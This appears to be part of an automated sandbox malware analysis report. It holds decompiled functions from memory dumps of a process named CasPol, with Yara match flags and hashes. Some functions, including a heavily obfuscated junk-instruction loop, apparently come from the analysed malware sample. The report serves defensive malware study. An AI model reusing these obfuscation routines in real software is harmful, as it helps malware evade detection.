                                                                							_t67 = _v20;
                                                                							continue;
                                                                						}
                                                                						goto L11;
                                                                					}
                                                                				}
                                                                				L12:
                                                                				E0163FFB0(_t51, _t64, 0x1718a6c);
                                                                				while(1) {
                                                                					_t37 = _v28;
                                                                					_t55 =  &_v28;
                                                                					if(_t37 == _t55) {
                                                                						break;
                                                                					}
                                                                					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                                                						goto L10;
                                                                					} else {
                                                                						_t59 =  *_t37;
                                                                						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                                                							goto L10;
                                                                						} else {
                                                                							_t62 =  &_v28;
                                                                							_v28 = _t59;
                                                                							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                                                							continue;
                                                                						}
                                                                					}
                                                                					L18:
                                                                				}
                                                                				_pop(_t65);
                                                                				_pop(_t68);
                                                                				_pop(_t52);
                                                                				return E0166B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                                                				goto L18;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f4a4331b486ece7cf747a06b827ba492878abd611a387ed42be9017901eaabe
                                                                • Instruction ID: d23224886a71ead1b8a033991687ec91a707650364abb22643e3c70c20e25f13
                                                                • Opcode Fuzzy Hash: 5f4a4331b486ece7cf747a06b827ba492878abd611a387ed42be9017901eaabe
                                                                • Instruction Fuzzy Hash: 653157B2A09302CFC714DF18D98081ABBE1FB85610F04896EE4889B395D730DA04CBA7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E00421821() {
                                                                				signed int _t11;
                                                                				signed int _t12;
                                                                				signed int _t13;
                                                                				intOrPtr _t15;
                                                                				signed char _t17;
                                                                				signed int _t19;
                                                                				signed int _t20;
                                                                				signed int _t21;
                                                                				signed int _t24;
                                                                
                                                                				_t12 = _t11 ^ 0x0add1ee9;
                                                                				 *0xce406ce7 =  *0xce406ce7 ^ _t13;
                                                                				_t21 = _t20 ^  *0x67d44423;
                                                                				if(_t24 ==  *0xfd093b1f) {
                                                                					__eax = __eax -  *0x17c3467a;
                                                                					__edi = __edi & 0x058bef1f;
                                                                					__ecx =  *0xf8876d69 * 0xc40a;
                                                                					if(__ecx <= 0) {
                                                                						__ebp =  *0xa56d6b7f * 0xf0bb;
                                                                						_t6 = __eax;
                                                                						__eax =  *0xa3b6e16;
                                                                						 *0xa3b6e16 = _t6;
                                                                						__cl = __cl ^  *0x504aa14;
                                                                						__bl = __bl + 0xa0;
                                                                						asm("adc ecx, 0x6f1adf37");
                                                                						__esi = __esi - 0xfd580f3b;
                                                                						__edx = __edx - 0x6bc9ee99;
                                                                						 *0x77fc8195 = __edx;
                                                                						asm("rcl byte [0x5dd483a], 0x7c");
                                                                						asm("adc ebx, [0x7d001221]");
                                                                						if(__edx < 0) {
                                                                							 *0xcbb99671 =  *0xcbb99671 | __esp;
                                                                							_push(__ebp);
                                                                							if( *0xcbb99671 < 0) {
                                                                								 *0x7adfec79 =  *0x7adfec79 ^ __esi;
                                                                								asm("sbb eax, [0x24a3ebfa]");
                                                                								__esp = __esp | 0x2b34ca11;
                                                                								asm("cmpsb");
                                                                								__al = __al + 0x8a;
                                                                								asm("adc eax, [0xe58289fd]");
                                                                								__esi = __esi + 1;
                                                                								__esp = __esp & 0x5c79decb;
                                                                								asm("movsb");
                                                                								__ebp = __ebp + 1;
                                                                								 *0xc2be5c0b =  *0xc2be5c0b ^ __esi;
                                                                								__ch = __ch +  *0x8c7b7eb4;
                                                                								_pop(__edi);
                                                                								 *0xb88c21ee =  *0xb88c21ee << 0x5f;
                                                                								_t7 = __ecx;
                                                                								__ecx =  *0xdbcb8;
                                                                								 *0xdbcb8 = _t7;
                                                                								__esi = __esi +  *0x956f461f;
                                                                								__cl = __cl - 0x24;
                                                                								__esp = __esp ^  *0xed5d94cb;
                                                                								__edi =  *0x264ff7d3;
                                                                								 *0x112e1493 =  *0x112e1493 + __eax;
                                                                								__ebx = __ebx | 0xc9c9b983;
                                                                								asm("adc [0xdad977a0], dh");
                                                                								asm("sbb edx, [0x8b739d35]");
                                                                								__esp = __eax;
                                                                								__edi =  *0x472b3069 * 0xaf9a;
                                                                								__esp =  *0x5d47433f;
                                                                								 *0xb241bab2 =  *0xb241bab2 << 0x4b;
                                                                								__edi =  *0x472b3069 * 0xaf9a - 1;
                                                                								__ebx = __ebx + 0x45bb5607;
                                                                								__esp =  *0x4077cfdf;
                                                                								 *0x4077cfdf =  *0x5d47433f;
                                                                								asm("sbb cl, 0xa8");
                                                                								asm("cmpsb");
                                                                								 *0x4e88c618 =  *0x4e88c618 & __dh;
                                                                								_pop(__eax);
                                                                								asm("stosd");
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				L1:
                                                                				asm("sbb [0xc36efb09], edx");
                                                                				asm("adc [0x767ba821], ebx");
                                                                				 *0x240d8bd4 =  *0x240d8bd4 >> 0;
                                                                				_t12 = _t12 & 0x0000000c;
                                                                				_t21 = (_t21 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
                                                                				 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
                                                                				asm("sbb ebp, [0x8771e3b]");
                                                                				_push(_t21);
                                                                				_t19 = _t19 &  *0x912dd0fb;
                                                                				_t17 = _t17 & 0x00000020;
                                                                				asm("rol byte [0xf89935f2], 0x22");
                                                                				asm("rol dword [0xfbe9540d], 0x6c");
                                                                				 *0x9459ca0a = _t15;
                                                                				 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
                                                                				asm("adc bl, [0xc320ed3c]");
                                                                				_t24 =  *0x1ac1b56a * 0x85fc;
                                                                				asm("scasb");
                                                                				_t15 =  *0x9459ca0a - 1;
                                                                				 *0xaab74829 =  *0xaab74829 ^ _t12;
                                                                				asm("rcl dword [0x7f106817], 0x35");
                                                                				asm("adc eax, [0x9d56ea15]");
                                                                				_t13 = _t13 +  *0x5ceec7ba &  *0x3b22d9f7;
                                                                				 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
                                                                				goto L1;
                                                                			}













                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                • Instruction ID: 66b8aff2017cfeca453581ed2337e8374f4464e0b25fe9a780bace185d95b657
                                                                • Opcode Fuzzy Hash: cac74a819437b5611dc75fad9e3164fcc12c1fdb1a154e1179507ce690b5ab9e
                                                                • Instruction Fuzzy Hash: 33418872A18310CFE706DF35D85AB523FB1F352310F45416ED5A297992E7342626CF8A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E0165A70E(intOrPtr* __ecx, char* __edx) {
                                                                				unsigned int _v8;
                                                                				intOrPtr* _v12;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* _t16;
                                                                				intOrPtr _t17;
                                                                				intOrPtr _t28;
                                                                				char* _t33;
                                                                				intOrPtr _t37;
                                                                				intOrPtr _t38;
                                                                				void* _t50;
                                                                				intOrPtr _t52;
                                                                
                                                                				_push(__ecx);
                                                                				_push(__ecx);
                                                                				_t52 =  *0x1717b10; // 0x0
                                                                				_t33 = __edx;
                                                                				_t48 = __ecx;
                                                                				_v12 = __ecx;
                                                                				if(_t52 == 0) {
                                                                					 *0x1717b10 = 8;
                                                                					 *0x1717b14 = 0x1717b0c;
                                                                					 *0x1717b18 = 1;
                                                                					L6:
                                                                					_t2 = _t52 + 1; // 0x1
                                                                					E0165A990(0x1717b10, _t2, 7);
                                                                					asm("bts ecx, eax");
                                                                					 *_t48 = _t52;
                                                                					 *_t33 = 1;
                                                                					L3:
                                                                					_t16 = 0;
                                                                					L4:
                                                                					return _t16;
                                                                				}
                                                                				_t17 = L0165A840(__edx, __ecx, __ecx, _t52, 0x1717b10, 1, 0);
                                                                				if(_t17 == 0xffffffff) {
                                                                					_t37 =  *0x1717b10; // 0x0
                                                                					_t3 = _t37 + 0x27; // 0x27
                                                                					__eflags = _t3 >> 5 -  *0x1717b18; // 0x0
                                                                					if(__eflags > 0) {
                                                                						_t38 =  *0x1717b9c; // 0x0
                                                                						_t4 = _t52 + 0x27; // 0x27
                                                                						_v8 = _t4 >> 5;
                                                                						_t50 = L01644620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                                						__eflags = _t50;
                                                                						if(_t50 == 0) {
                                                                							_t16 = 0xc0000017;
                                                                							goto L4;
                                                                						}
                                                                						 *0x1717b18 = _v8;
                                                                						_t8 = _t52 + 7; // 0x7
                                                                						E0166F3E0(_t50,  *0x1717b14, _t8 >> 3);
                                                                						_t28 =  *0x1717b14; // 0x0
                                                                						__eflags = _t28 - 0x1717b0c;
                                                                						if(_t28 != 0x1717b0c) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                						}
                                                                						_t9 = _t52 + 8; // 0x8
                                                                						 *0x1717b14 = _t50;
                                                                						_t48 = _v12;
                                                                						 *0x1717b10 = _t9;
                                                                						goto L6;
                                                                					}
                                                                					 *0x1717b10 = _t37 + 8;
                                                                					goto L6;
                                                                				}
                                                                				 *__ecx = _t17;
                                                                				 *_t33 = 0;
                                                                				goto L3;
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1cd7eeb0dde920686ad315764c68dd62c22b5cfd014845b7a1ea81e8903169c2
                                                                • Instruction ID: 3a49618a4f39fbe1b78d73cb3e4317960fec7163a899740412c159b1ce30f5cf
                                                                • Opcode Fuzzy Hash: 1cd7eeb0dde920686ad315764c68dd62c22b5cfd014845b7a1ea81e8903169c2
                                                                • Instruction Fuzzy Hash: 8531ADB57002059FD739CB5CEC80F6ABBFAFB84720F148A5AE60587348D774A901CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 97%
                                                                			E016561A0(signed int* __ecx) {
                                                                				intOrPtr _v8;
                                                                				char _v12;
                                                                				intOrPtr* _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _t30;
                                                                				intOrPtr _t31;
                                                                				void* _t32;
                                                                				intOrPtr _t33;
                                                                				intOrPtr _t37;
                                                                				intOrPtr _t49;
                                                                				signed int _t51;
                                                                				intOrPtr _t52;
                                                                				signed int _t54;
                                                                				void* _t59;
                                                                				signed int* _t61;
                                                                				intOrPtr* _t64;
                                                                
                                                                				_t61 = __ecx;
                                                                				_v12 = 0;
                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                				_v16 = __ecx;
                                                                				_v8 = 0;
                                                                				if(_t30 == 0) {
                                                                					L6:
                                                                					_t31 = 0;
                                                                					L7:
                                                                					return _t31;
                                                                				}
                                                                				_t32 = _t30 + 0x5d8;
                                                                				if(_t32 == 0) {
                                                                					goto L6;
                                                                				}
                                                                				_t59 = _t32 + 0x30;
                                                                				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                					goto L6;
                                                                				}
                                                                				if(__ecx != 0) {
                                                                					 *((intOrPtr*)(__ecx)) = 0;
                                                                					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                				}
                                                                				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                					_t51 =  *(_t32 + 0x10);
                                                                					_t33 = _t32 + 0x10;
                                                                					_v20 = _t33;
                                                                					_t54 =  *(_t33 + 4);
                                                                					if((_t51 | _t54) == 0) {
                                                                						_t37 = E01655E50(0x16067cc, 0, 0,  &_v12);
                                                                						if(_t37 != 0) {
                                                                							goto L6;
                                                                						}
                                                                						_t52 = _v8;
                                                                						asm("lock cmpxchg8b [esi]");
                                                                						_t64 = _v16;
                                                                						_t49 = _t37;
                                                                						_v20 = 0;
                                                                						if(_t37 == 0) {
                                                                							if(_t64 != 0) {
                                                                								 *_t64 = _v12;
                                                                								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                							}
                                                                							E016F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                							_t31 = 1;
                                                                							goto L7;
                                                                						}
                                                                						E0162F7C0(_t52, _v12, _t52, 0);
                                                                						if(_t64 != 0) {
                                                                							 *_t64 = _t49;
                                                                							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                						}
                                                                						L12:
                                                                						_t31 = 1;
                                                                						goto L7;
                                                                					}
                                                                					if(_t61 != 0) {
                                                                						 *_t61 = _t51;
                                                                						_t61[1] = _t54;
                                                                					}
                                                                					goto L12;
                                                                				} else {
                                                                					goto L6;
                                                                				}
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3caa4f6948aa0e5f0d48e5d44af4a257ad89584a9a6afa2268354a4b46d3dea0
                                                                • Instruction ID: 40f2f4a972829a340474d0d6750d4ae035af70b657e6383914f9e512d8b45f55
                                                                • Opcode Fuzzy Hash: 3caa4f6948aa0e5f0d48e5d44af4a257ad89584a9a6afa2268354a4b46d3dea0
                                                                • Instruction Fuzzy Hash: 5C315A716157118FE760CF1DCC40B26BBE9FB88B10F45496DE99997351E770E804CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 95%
                                                                			E0162AA16(signed short* __ecx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				signed short _v16;
                                                                				intOrPtr _v20;
                                                                				signed short _v24;
                                                                				signed short _v28;
                                                                				void* _v32;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr _t25;
                                                                				signed short _t38;
                                                                				signed short* _t42;
                                                                				signed int _t44;
                                                                				signed short* _t52;
                                                                				signed short _t53;
                                                                				signed int _t54;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t54;
                                                                				_t42 = __ecx;
                                                                				_t44 =  *__ecx & 0x0000ffff;
                                                                				_t52 =  &(__ecx[2]);
                                                                				_t51 = _t44 + 2;
                                                                				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                					L4:
                                                                					_t25 =  *0x1717b9c; // 0x0
                                                                					_t53 = L01644620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                					__eflags = _t53;
                                                                					if(_t53 == 0) {
                                                                						L3:
                                                                						return E0166B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                					} else {
                                                                						E0166F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                						L2:
                                                                						_t51 = 4;
                                                                						if(L01636C59(_t53, _t51, _t58) != 0) {
                                                                							_t28 = E01655E50(0x160c338, 0, 0,  &_v32);
                                                                							__eflags = _t28;
                                                                							if(_t28 == 0) {
                                                                								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                								__eflags = _t38;
                                                                								_v24 = _t53;
                                                                								_v16 = _t38;
                                                                								_v20 = 0;
                                                                								_v12 = 0;
                                                                								E0165B230(_v32, _v28, 0x160c2d8, 1,  &_v24);
                                                                								_t28 = E0162F7A0(_v32, _v28);
                                                                							}
                                                                							__eflags = _t53 -  *_t52;
                                                                							if(_t53 !=  *_t52) {
                                                                								_t28 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                							}
                                                                						}
                                                                						goto L3;
                                                                					}
                                                                				}
                                                                				_t53 =  *_t52;
                                                                				_t44 = _t44 >> 1;
                                                                				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                					goto L4;
                                                                				}
                                                                				goto L2;
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7714ba00b28670da9acc14e2cc97570c34e155760dab52690a882eb3c74acfd3
                                                                • Instruction ID: a2c4a4df9ebe6f06b7c3fc202883d2bc0288327c313fda73e8c09c69506efb57
                                                                • Opcode Fuzzy Hash: 7714ba00b28670da9acc14e2cc97570c34e155760dab52690a882eb3c74acfd3
                                                                • Instruction Fuzzy Hash: 5831B171A0062AABCF15AFA8CD81A7FB7B9EF04700F01456DF901E7250EB749A11DBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E004206B3(char* _a4) {
                                                                				signed int _t30;
                                                                				signed int _t35;
                                                                				signed int _t36;
                                                                				signed int _t55;
                                                                				intOrPtr _t56;
                                                                				signed int _t66;
                                                                				intOrPtr _t67;
                                                                				char* _t68;
                                                                				signed int _t78;
                                                                				signed int _t80;
                                                                
                                                                				_t68 = _a4;
                                                                				if(_t68 != 0) {
                                                                					if( *_t68 == 0) {
                                                                						_t2 = _t68 + 4; // 0xfffd5885
                                                                						_t35 =  *_t2;
                                                                						 *_t68 = 1;
                                                                						_t56 =  *0x7ffe0018;
                                                                						_t67 =  *0x7ffe001c;
                                                                						if(_t35 == 0) {
                                                                							_t36 =  *0x7ffe0014;
                                                                							do {
                                                                							} while (_t56 != _t67);
                                                                						} else {
                                                                							_t80 =  *0x7ffe0014;
                                                                							do {
                                                                							} while (_t56 != _t67);
                                                                							_t36 = _t35 * _t80;
                                                                						}
                                                                						 *(_t68 + 8) = _t36;
                                                                						 *(_t68 + 0xc) = 0x249a;
                                                                						 *(_t68 + 0x10) = 0x6eea;
                                                                						 *(_t68 + 0x14) = 0x2392;
                                                                					}
                                                                					_t7 = _t68 + 8; // 0xfc33bff
                                                                					_t55 = ( *_t7 << 0x00000012 ^  *_t7 >> 0x00000007) & 0x0007ffff ^  *_t7 << 0x00000012 ^  *_t7 >> 0x0000000d;
                                                                					_t8 = _t68 + 0xc; // 0x1c084
                                                                					_t66 = ( *_t8 >> 0x00000019 ^  *_t8 * 0x00000004) & 0x0000001f ^  *_t8 >> 0x0000001b ^ _t20 + _t20 + _t20 + _t20;
                                                                					_t10 = _t68 + 0x10; // 0xa8e85000
                                                                					_t23 =  *_t10;
                                                                					_t11 = _t68 + 0x14; // 0x8b000121
                                                                					_t78 = ( *_t10 >> 0x00000008 ^  *_t10 << 0x00000007) & 0x000007ff ^  *_t10 >> 0x00000015 ^ _t23 << 0x00000007;
                                                                					_t12 = _t68 + 0x14; // 0x8b000121
                                                                					_t13 = _t68 + 0x14; // 0x8b000121
                                                                					_t30 = ( *_t11 << 0x0000000d ^  *_t11 >> 0x00000009) & 0x000fffff ^  *_t12 >> 0x0000000c ^  *_t13 << 0x0000000d;
                                                                					 *(_t68 + 0x14) = _t30;
                                                                					 *(_t68 + 0x10) = _t78;
                                                                					 *(_t68 + 8) = _t55;
                                                                					 *(_t68 + 0xc) = _t66;
                                                                					return (_t30 ^ _t78 ^ _t66 ^ _t55) >> 1;
                                                                				} else {
                                                                					return 0;
                                                                				}
                                                                 			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                • Instruction ID: e503b2f001887b4e9d272e8574f2700f8db73224c201d040bcf754bef4412a1e
                                                                • Opcode Fuzzy Hash: 868f8848cc0017c96682057139142897486ae11c8f30db65a7bbf8e11136fabf
                                                                • Instruction Fuzzy Hash: 2C31CE72B006265BD344CE3AD88065AB3E2FBC8350B54863AD919C3B41E778F962CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 58%
                                                                			E01664A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                				signed int _v8;
                                                                				signed int* _v12;
                                                                				char _v13;
                                                                				signed int _v16;
                                                                				char _v21;
                                                                				signed int* _v24;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t29;
                                                                				signed int* _t32;
                                                                				signed int* _t41;
                                                                				signed int _t42;
                                                                				void* _t43;
                                                                				intOrPtr* _t51;
                                                                				void* _t52;
                                                                				signed int _t53;
                                                                				signed int _t58;
                                                                				void* _t59;
                                                                				signed int _t60;
                                                                				signed int _t62;
                                                                
                                                                				_t49 = __edx;
                                                                				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                				_t26 =  *0x171d360 ^ _t62;
                                                                				_v8 =  *0x171d360 ^ _t62;
                                                                				_t41 = __ecx;
                                                                				_t51 = __edx;
                                                                				_v12 = __ecx;
                                                                				if(_a4 == 0) {
                                                                					if(_a8 != 0) {
                                                                						goto L1;
                                                                					}
                                                                					_v13 = 1;
                                                                					E01642280(_t26, 0x1718608);
                                                                					_t58 =  *_t41;
                                                                					if(_t58 == 0) {
                                                                						L11:
                                                                						E0163FFB0(_t41, _t51, 0x1718608);
                                                                						L2:
                                                                						 *0x171b1e0(_a4, _a8);
                                                                						_t42 =  *_t51();
                                                                						if(_t42 == 0) {
                                                                							_t29 = 0;
                                                                							L5:
                                                                							_pop(_t52);
                                                                							_pop(_t59);
                                                                							_pop(_t43);
                                                                							return E0166B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                						}
                                                                						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                						if(_v21 != 0) {
                                                                							_t53 = 0;
                                                                							E01642280(_t28, 0x1718608);
                                                                							_t32 = _v24;
                                                                							if( *_t32 == _t58) {
                                                                								 *_t32 = _t42;
                                                                								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                								if(_t58 != 0) {
                                                                									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                									asm("sbb edi, edi");
                                                                									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                								}
                                                                							}
                                                                							E0163FFB0(_t42, _t53, 0x1718608);
                                                                							if(_t53 != 0) {
                                                                								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                							}
                                                                						}
                                                                						_t29 = _t42;
                                                                						goto L5;
                                                                					}
                                                                					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                						L10:
                                                                						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                						E0163FFB0(_t41, _t51, 0x1718608);
                                                                						_t29 = _t58;
                                                                						goto L5;
                                                                					}
                                                                					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                						goto L11;
                                                                					}
                                                                					goto L10;
                                                                				}
                                                                				L1:
                                                                				_v13 = 0;
                                                                				_t58 = 0;
                                                                				goto L2;
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9518f52c601e332cbd85b53c29872464a782b76c9902874ec9a4db0f9995870f
                                                                • Instruction ID: e76905e9fdb8316b46db100e5e99017fd34346e71c4161ba53a3cb3acbd4e2be
                                                                • Opcode Fuzzy Hash: 9518f52c601e332cbd85b53c29872464a782b76c9902874ec9a4db0f9995870f
                                                                • Instruction Fuzzy Hash: F131D132205251ABC7229F58CD44B2AFBA9FBC4B10F05496DED5647259CB70D801CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E01668EC7(void* __ecx, void* __edx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				char* _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				intOrPtr _v40;
                                                                				signed int* _v44;
                                                                				intOrPtr _v48;
                                                                				intOrPtr _v52;
                                                                				intOrPtr _v56;
                                                                				signed int* _v60;
                                                                				intOrPtr _v64;
                                                                				intOrPtr _v68;
                                                                				intOrPtr _v72;
                                                                				char* _v76;
                                                                				intOrPtr _v80;
                                                                				signed int _v84;
                                                                				intOrPtr _v88;
                                                                				intOrPtr _v92;
                                                                				intOrPtr _v96;
                                                                				intOrPtr _v100;
                                                                				intOrPtr _v104;
                                                                				signed int* _v108;
                                                                				char _v140;
                                                                				signed int _v144;
                                                                				signed int _v148;
                                                                				intOrPtr _v152;
                                                                				char _v156;
                                                                				intOrPtr _v160;
                                                                				char _v164;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* _t67;
                                                                				intOrPtr _t70;
                                                                				void* _t71;
                                                                				void* _t72;
                                                                				signed int _t73;
                                                                
                                                                				_t69 = __edx;
                                                                				_v8 =  *0x171d360 ^ _t73;
                                                                				_t48 =  *[fs:0x30];
                                                                				_t72 = __edx;
                                                                				_t71 = __ecx;
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                					_t48 = E01654E70(0x17186e4, 0x1669490, 0, 0);
                                                                					if( *0x17153e8 > 5 && E01668F33(0x17153e8, 0, 0x2000) != 0) {
                                                                						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                						_v108 =  &_v84;
                                                                						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                						_v76 =  &_v156;
                                                                						_t70 = 8;
                                                                						_v60 =  &_v144;
                                                                						_t67 = 4;
                                                                						_v44 =  &_v148;
                                                                						_v152 = 0;
                                                                						_v160 = 0;
                                                                						_v104 = 0;
                                                                						_v100 = 2;
                                                                						_v96 = 0;
                                                                						_v88 = 0;
                                                                						_v80 = 0;
                                                                						_v72 = 0;
                                                                						_v68 = _t70;
                                                                						_v64 = 0;
                                                                						_v56 = 0;
                                                                						_v52 = 0x17153e8;
                                                                						_v48 = 0;
                                                                						_v40 = 0;
                                                                						_v36 = 0x17153e8;
                                                                						_v32 = 0;
                                                                						_v28 =  &_v164;
                                                                						_v24 = 0;
                                                                						_v20 = _t70;
                                                                						_v16 = 0;
                                                                						_t69 = 0x160bc46;
                                                                						_t48 = E016A7B9C(0x17153e8, 0x160bc46, _t67, 0x17153e8, _t70,  &_v140);
                                                                					}
                                                                				}
                                                                				return E0166B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                			}

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2aa06cfe63543b9210bc5d571c5274ba84dde3bd962bf9aab7d45cc7afcd8ada
                                                                • Instruction ID: 59738b5a0e0997cb9713dbecbc002e26329b8d027efbe5f9c650b6df7e48672d
                                                                • Opcode Fuzzy Hash: 2aa06cfe63543b9210bc5d571c5274ba84dde3bd962bf9aab7d45cc7afcd8ada
                                                                • Instruction Fuzzy Hash: C141A2B1D003189FDB24CFAAD980AADFBF9FB48310F5081AEE509A7240E7755A84CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

